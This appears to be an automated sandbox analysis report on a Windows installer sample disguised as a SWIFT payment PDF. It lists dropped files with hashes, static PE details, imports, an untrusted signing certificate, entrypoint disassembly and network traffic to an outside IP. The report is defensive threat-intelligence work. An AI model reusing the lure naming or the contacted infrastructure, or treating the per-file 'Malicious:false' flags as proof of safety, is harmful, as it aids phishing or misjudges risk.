                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....e.Q...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Milched.gri

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):217824
                                    Entropy (8bit):1.0399386438008156
                                    Encrypted:false
                                    SSDEEP:768:TxtDvwwKe7lLjmPR6s64AFEdo7QFOIZ8v6oS/88AGuh7Wz+dUa826EL6tqZscZGg:XgCj6kzuIT
                                    MD5:0CDAC4CECC5709A94D54CCAED51945E0
                                    SHA1:DA022C65989787E3C16C0FD4754FEB55E2851D60
                                    SHA-256:A6EBB5155B1EB41CF2485F84E7FD89ECC3FEB27B0EAD2F11107495E662BC776F
                                    SHA-512:4D54F9D2CAFA7E6D88BA394D17B4748D37ADAB57D0F18AC2D9162F4789D3EF3599CCE94570195525699819ACFBD8A56E44B15B2735382737675ABA34BF663642
                                    Malicious:false
                                    Preview:..4..................a........................................................................................p................................r......................................................................................A..........@.^.....b............................................".X........................=..............i.......................................................................................................(......................................................$..............................q...................................................................../.........#...........a............................................................;..............W.........................................................B...............:............................q.......$...............................A.......................................a.........................................J............................<...................................................

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Uforstaaeligheds.Com

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):153900
                                    Entropy (8bit):7.748880956807625
                                    Encrypted:false
                                    SSDEEP:3072:NoIf/wL0q3LqwKd9z1hu9dDlaCYKo54xLPEAdJFxQjlH6UjpO3:NTf4YbDzj0VzYZ54VHQdVI
                                    MD5:AF0A71A847EAFD2BC3C2CEE3D0F81BEA
                                    SHA1:B3778CCE5E994E2DEDE039B30D44E85F945B4275
                                    SHA-256:2BDF5166D0B62258965F6B308CF42150D8D129DE55E59C6851D744E7242A0D7D
                                    SHA-512:27BCB4EA5AA12A4EE82633332AFAA41627975D301F85AB6B4D13B0CAEE9FCBCA310D863EC969E69782F03D1F13AF13A8DBA4B12A592E19FCA3AB71EAC63436D0
                                    Malicious:false
                                    Preview:.......w......L.(((.>....;..ii...==.%.....77777..........................E......NNN..444.t..................FFF.....6.......~.....p.......ff.''...... ...u........Z....ddd.......vv.......ssssss.EEE.....,...........UU.oooo.............:.........|.........H.........................00.y.........x.&.....................+..............ppp..........0.@@...............<....A...............pp.11.***.L.JJ.........H.............X......II..Z...........ss.n.....\\.................====................<<.........::.......S.....@.....::::......................:...:............................................S...........................??..........&.;..............;;;...........'''''.........E.f...f!...W..........t.!....4.q........7f...............f...!..."(?f.......Z.....X......k..f...........j>1.!......:.....'.....f........f=.l.....+.0..........|...f........}.@...!. ....1.<.f....................f...........|........f.....0.r.....bh..f...C.....-;.&f......|.G...f.....*,......6.B....

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy\perivesical.cer

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                    Category:dropped
                                    Size (bytes):284271
                                    Entropy (8bit):1.0251357322266477
                                    Encrypted:false
                                    SSDEEP:768:3ikksaRhO0tDtDHT4agsOypRJ5UVofBnhIOPNs28Bu7LYDRa5dv8Kn8GBrhGmVxr:FiRk48kL78Ka
                                    MD5:FCF65B7D81E9B8F78EC8C24CA3092A8A
                                    SHA1:700291ADFE86A3022D39E46E71D9E44E158C6F6D
                                    SHA-256:A91235C263F3C28790B391F6EAD3ED10F674FBF7FC5E10A3640F9937902273E8
                                    SHA-512:C1F136D6C9CAD6A9195DA2690A8FCF2640A364DC6D636B2B8218C7022A59D2E99305ECDD201B614A92CE7EC4A955FC7C3389B7862BD25CACC531DFDE3B2DAEF3
                                    Malicious:false
                                    Preview:...........................1...............................................&......................................~...................i.........................v.....................................................................................................................................D........y................m......................................................]..........F..J..........................................:.....#.......p. .........k................................................{..............Q..........=.....................................................................@............s....l..........u........................................................................[..........................................................................................................................\..............<........................................i...........................g.....................................................I................R.X.0............

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy\vanskabningers.txt

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):494
                                    Entropy (8bit):4.230726516650528
                                    Encrypted:false
                                    SSDEEP:12:pKG5STxNjA4TkEIQT5i6Dk3Qm0oyyGq2qAOaUwbeKWjNB/JJsn:pP5STx5jTkqT5iMJiRaUWedBBBJsn
                                    MD5:19B947E1171EC056B5989798225E3080
                                    SHA1:C8703F1F4AE3A1A81924FAF13F7305CBA4AEF6CA
                                    SHA-256:D7F13F88A63E6A8EDB1DD1A5C194004A3FC24C870D2AC6013FAF13AFC6E77577
                                    SHA-512:E0E4878AF414BD2845ED7A63AEA844DAD77BDAD375D2BD6A2A69DE9A8730571059BCA5C7F937C2BD5205D13D92CFE8B22684214EB0BA673C9446F10DEBF24D25
                                    Malicious:false
                                    Preview:dentical baldrende kekchi colectomies cupressus roofers..overregulates reaccumulation travestiernes ecdyson mezentius garnngle spasticitets brnehavelrerindernes liplike electrodiplomatic..heteropelmous traadls statsoverhoveder eftersprgselspressenes.skrsliberne aspired twaddles mangle gentoo porphyrogenitus quislingers.underteamed bonitet prostigmin kontorsystemers fresser shutterbugs forlngerledningen velokalernes moguey..nonsympathetically lutetian friarealer sciatically hosea stymperes,

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\kryddernes\Kontorarbejderne\Helbredskontrollen.Ana

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11919
                                    Entropy (8bit):4.662231882647804
                                    Encrypted:false
                                    SSDEEP:192:Lk13ArLrSFODVN/Rw8+twz9KC++zakPjz4dev5tMTo:L8wTXV+twxKC1P3sAtCo
                                    MD5:C904D46896C283F2B7BA50B5553450F2
                                    SHA1:92E34620A0C1449364A53043E849271F209F901A
                                    SHA-256:A2A01736F72E3601A76D3CB12BA8E0EE20F9A346AF3FC7184098AFF7B5B36533
                                    SHA-512:D51DEBA89B8035C819DEDC7DEDF720551F4CAD2CEF06F9C4CE31857B4EFF1EFDC53644CD38593A8AE18AA41E0090D3931AC95DF89263D2B10D0D1BB76A03AA66
                                    Malicious:false
                                    Preview:..&&.j...............y........................"...............................................................................................................................................................................................................................................................................HH...................t..p.''...``....,.".]...r...........0.l....................................oooo....V......._.......................UU...MM...........................TT...............p.n..........rr..............`.........................................1....................d.....s.........e.....9...............................QQQ.Q....))..................d.^......d..............i...............666666.nn.............G.........~~~~.........XX...666..............@@@......................AAA.....XXX.........................H....@@.......................l.......d.D.....e........KKK.......J...>.BB....@..nnnnnnnnnnnn.......00.....

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\kryddernes\Kontorarbejderne\dhourra.dei

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):281794
                                    Entropy (8bit):1.031572732289543
                                    Encrypted:false
                                    SSDEEP:768:oslLjhedzTOljJJZU1Buju3jmpZOzcqM4uYLjqTSL6C7obTtV3tkQuHtJ2vj+CXu:oOJJZDj7341Vonj5aCZ
                                    MD5:E828786A178F23B7F56B9990A65CEEA5
                                    SHA1:0FFE78218DF805DA550BE16EE19E9946F39363B5
                                    SHA-256:9BAAB1CDE953046954210F305136997005939F5EB8529DD51B2459034D0FBDFD
                                    SHA-512:C4E5CBC49D03AA2C5E5EB2A2C9AD21CD9A375A98E686B5C3729C0B2B00A7CE5D7705E56F221F9B49538A433CCDA12F1DD65CE97C0D4DB9B1F9F8C8AC18A49CCC
                                    Malicious:false
                                    Preview:........................................z.....1...............................................................................I..................................................................................f..................................................................................[...b..................................................................................................I.....H...R.K........M........................2....D......................................................./....................B...................................../...h..................................................u........?...........................S...............4..........M........._........................R..............................n......................................................................................................................Z........................................................................................................h............................

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\kryddernes\Kontorarbejderne\fiskeriinteressernes.bnk

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):188525
                                    Entropy (8bit):1.0329334808429573
                                    Encrypted:false
                                    SSDEEP:768:5WINhheDhXPeDwAT/fXFKxz/nHTslCNCS6HKLs+SfWpHk6:LnFMplE6
                                    MD5:04A03D1660020BED3AB9984BFAA2EF04
                                    SHA1:21CB45D775B5DC16CABA3B80C3B458B3DBBCFB34
                                    SHA-256:A0D4F715188B1044C5F9876491F8CECE5728D166DA60B9514DD244ECF42F29F6
                                    SHA-512:352260C7501E0751FB93845B7BDDECA1BCC29DCFB745CCAA0A106556C2CA5787B0C64BCCAFDCC3FF2FF1AE0E428E03F8F6660AEFBF03EBF99A5C0D7769C3BEB9
                                    Malicious:false
                                    Preview:.................................................O.................................................+........................................G..................b.................z.......y........................................................................................................P.........!...........................................................C..................................$.................................................................k.................x........1........................................................D.......................p................................................+................................f.....................C.....-............................~......................................................Z........b....................................................................................2............................................................................(.........G...........................................#...........

                                    C:\Users\user\udskriftskartotek\chiromancy\refalling\kryddernes\Kontorarbejderne\motleyest.hea

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):78505
                                    Entropy (8bit):1.024537818999984
                                    Encrypted:false
                                    SSDEEP:384:OAC2dKLt1Lsw1d6OnQhcT+7ItGC3VVnxwZHr4WpJuHqLrJzE:5IYw1d6OnfT+8zWpJuIJz
                                    MD5:F18075570354F7C71286D7E633605CE6
                                    SHA1:1CE1B223EAE5AE1BF61B72A4032953271A07C3CC
                                    SHA-256:50B67542F8655D7110CD14285A6E8BFD3F238B3AF26985D7F57C48F78A0BB646
                                    SHA-512:FE91EA361444335D3B67691CBA1776A94D5BDBA16359D507F1B6042A02F6F4C4A2B9FF8E45609759EAA51F94F17D47E28DA7995BB123E9B742900DACE917F018
                                    Malicious:false
                                    Preview:.......................x.................. .......................................Q.......~.......................:..........................................................+.............W......l....................?[...........................W...........V.o..*...............)..........N.......................................A..........................................................!........^....................-...+..............................`........................h......................................f...........\....a.....................................C.............y................................................................................S.......................................................................................................y.........................................c............B...............................G..................................<...............K=..........................................................................................

                                    C:\Windows\Resources\0409\gashanens.ini

                                    Download File
                                    Process:C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):30
                                    Entropy (8bit):4.01506101220307
                                    Encrypted:false
                                    SSDEEP:3:+f4tfEOGOWbP:U4tf9GOWbP
                                    MD5:9A87E14E4F6590E4B39073FCF55944A4
                                    SHA1:4AF8D2E9EE06321E83497982ED8E55AF244A8B07
                                    SHA-256:D6E32A651EBDD996FB69025D557FECFCD8547729091BF76327B0A118A6D333FC
                                    SHA-512:128B8180EFD08F7A86635694A4B7CE634A24636E851D4A293F9B677AA4BC9A5F6D0EDD61896F4D7FB74F55E99B929822A6FF5AF0FE6428BE9EE4D14AFEB37B34
                                    Malicious:false
                                    Preview:[menthane]..raffaele=voksvrk..

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):2359296
                                    Entropy (8bit):4.362643507184067
                                    Encrypted:false
                                    SSDEEP:49152:AnvorTo81uJOaX1OADJEEagmcnYJ1u8vs:r
                                    MD5:DA4FBC3BC298FB60CB7219E669C0194B
                                    SHA1:A0B8BF1442AB017D1FC0B808A74A964F3BB4040F
                                    SHA-256:F21F704D2E9D54087CF203BA89822A5F10EEE982DC75A44B80A7ACDACF6FF9B8
                                    SHA-512:810D4454C4A8EA95D4613190C2803508F20CB9AE3E485470DC22DCD46C07E2B726AAEBF8EC8B38E421D17BEA4357457F82F0991ABA226646E39FCDF8A575460D
                                    Malicious:false
                                    Preview:regfF...F...5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.(.................................................................................................................................................................................................................................................................................................................................................C*.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):3.240162043914715
                                    Encrypted:false
                                    SSDEEP:768:8mQyPan9aUCUWaOy/OTIi86uXYCImggUJqR5/eF34JoeyG2SKiDEU/wIZLs5agYs:3ERuLLuX0mRNRD/7G4gYfe+M
                                    MD5:3B3172247B5079ED7E1023D92D6EBAD7
                                    SHA1:79DA5B5B1936E6F82BD10C4572C68A681D32A82D
                                    SHA-256:BF09C6B1BBF6B8B4649CDC11451F844E613296E5C8AAD0BD1981BD52EBD0D000
                                    SHA-512:F0BC981CA0AA52A6FA27A6EC1284099AEEAE7DCE823EA5C59E53383E12329414946870B31D7AC297F24640B161DEEDD14D4406CEF694D1B8123BCC4F113DBF3E
                                    Malicious:false
                                    Preview:regfE...E...5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.(.................................................................................................................................................................................................................................................................................................................................................C*.HvLE........E.....!.....3....b.^p.so-..}.........P...............................`.......................................................P!.......!.....hbin................5.#.^...........nk,....S...............................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ..$8^........(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):7.682325489967793
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SWIFTCOPYMT1030000000_pdf.exe
                                    File size:421'592 bytes
                                    MD5:1048340bcfae30df032c161ac52f8f0e
                                    SHA1:8a3370d01a170626ef43202f5fe54e27372abec4
                                    SHA256:47a75ba2cc69f372c816fb61d079ebe6e3a81eeeb16e72726725b088a59f4e94
                                    SHA512:446b5293fe99200305cde7b4eaf17613b6c211ac46ce5ef38d383546c727de348f6f4733051674ce309a1ed401941985120b0f80f449239d3375f91a2de2704c
                                    SSDEEP:6144:TzZzycMVGAnF3KMrbYTE6ZudWKJJGGCaSninelmgkpmcqaw/cXraHvfMV:5V9QF3ihgxtdel+jw/ar4vm
                                    TLSH:9A94CF56E349ACA4ED1B07B5663BED724E13BEB8D460544D25DE3E2F3A73382402AD43
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....e.Q.................\....9....

                                    File Icon

                                    Icon Hash:d080c6ee8e92ca1d

                                    Static PE Info

                                    General

                                    Entrypoint:0x4030ef
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x519965C7 [Sun May 19 23:52:39 2013 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b40f29cd171eb54c01b1dd2683c9c26b

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:E=Semicomplicated@Vrdipapirets.Ib, O=Barnestemmen, OU="Trommer Taljerings Beseglet ", CN=Barnestemmen, L=Malpas, S=England, C=GB
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 19/03/2024 04:25:51 19/03/2027 04:25:51
                                    Subject Chain
                                    • E=Semicomplicated@Vrdipapirets.Ib, O=Barnestemmen, OU="Trommer Taljerings Beseglet ", CN=Barnestemmen, L=Malpas, S=England, C=GB
                                    Version:3
                                    Thumbprint MD5:72A0C51184EA239E3D8B07F2533C830A
                                    Thumbprint SHA-1:B5D55F0EBABB32F51FFE7CFAE772684E37784D2B
                                    Thumbprint SHA-256:F733F533CB918821C2FB04E9426DEECB50A81E7F2FDB4DE85740159CAFCC5D15
                                    Serial:299C36F294A51C29CB99380D7E7AF51734A58CC7

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 00000184h
                                    push ebx
                                    push ebp
                                    push esi
                                    xor ebx, ebx
                                    push edi
                                    mov dword ptr [esp+1Ch], ebx
                                    mov dword ptr [esp+10h], 00409190h
                                    mov dword ptr [esp+18h], ebx
                                    mov byte ptr [esp+14h], 00000020h
                                    call dword ptr [00407034h]
                                    push 00008001h
                                    call dword ptr [004070B0h]
                                    push ebx
                                    call dword ptr [0040728Ch]
                                    push 00000008h
                                    mov dword ptr [007A27B8h], eax
                                    call 00007F276C530BE3h
                                    mov dword ptr [007A2704h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+38h]
                                    push 00000160h
                                    push eax
                                    push ebx
                                    push 0079DCB8h
                                    call dword ptr [00407164h]
                                    push 00409180h
                                    push 007A1F00h
                                    call 00007F276C53088Dh
                                    call dword ptr [0040711Ch]
                                    mov ebp, 007A8000h
                                    push eax
                                    push ebp
                                    call 00007F276C53087Bh
                                    push ebx
                                    call dword ptr [00407114h]
                                    cmp byte ptr [007A8000h], 00000022h
                                    mov dword ptr [007A2700h], eax
                                    mov eax, ebp
                                    jne 00007F276C52DE7Ch
                                    mov byte ptr [esp+14h], 00000022h
                                    mov eax, 007A8001h
                                    push dword ptr [esp+14h]
                                    push eax
                                    call 00007F276C530328h
                                    push eax
                                    call dword ptr [00407220h]
                                    mov dword ptr [esp+20h], eax
                                    jmp 00007F276C52DF30h
                                    cmp cl, 00000020h
                                    jne 00007F276C52DE78h
                                    inc eax
                                    cmp byte ptr [eax], 00000020h
                                    je 00007F276C52DE6Ch

                                    Rich Headers

                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3bf0000x111c8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x664900xa48.data
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x5bc20x5c00d75213ff3654bd251ba7ede13ba551f3False0.6815132472826086data6.5073852787100455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x70000x11ce0x12006c31e0693072284f258d2c4a271de506False0.4524739583333333OpenPGP Secret Key5.236327486414569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x90000x3997f80x400cc4b8c7cfe81dc194cfb0c595288fc86unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x3a30000x1c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x3bf0000x111c80x11200bbb015d8423c571296eed99a1464fd36False0.12783702098540145data4.40852816567891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x3bf2080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/mEnglishUnited States0.11396841358097717
                                    RT_DIALOG0x3cfa300x120dataEnglishUnited States0.5138888888888888
                                    RT_DIALOG0x3cfb500x11cdataEnglishUnited States0.6091549295774648
                                    RT_DIALOG0x3cfc700xc4dataEnglishUnited States0.5918367346938775
                                    RT_DIALOG0x3cfd380x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x3cfd980x14dataEnglishUnited States1.15
                                    RT_VERSION0x3cfdb00x148x86 executable not strippedEnglishUnited States0.600609756097561
                                    RT_MANIFEST0x3cfef80x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665

                                    Imports

                                    DLLImport
                                    KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                    USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                    ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                    ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 26, 2024 13:39:20.856138945 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.111232996 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.111480951 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.111854076 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.363962889 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364439964 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364517927 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364628077 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.364676952 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364845991 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364903927 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.364911079 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.364911079 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.364959955 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.365021944 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.365078926 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.365081072 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.365134001 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.365248919 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.365293026 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.365418911 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.365418911 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.365418911 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.365535975 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.615818977 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.615900040 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.615958929 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616014957 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616070032 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616127014 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616157055 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616158009 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616215944 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616280079 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616337061 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616379023 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616379023 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616379023 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616390944 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616447926 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616503954 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616547108 CEST5034180192.168.11.2094.156.8.104
                                    Apr 26, 2024 13:39:21.616559029 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616616011 CEST805034194.156.8.104192.168.11.20
                                    Apr 26, 2024 13:39:21.616671085 CEST805034194.156.8.104192.168.11.20
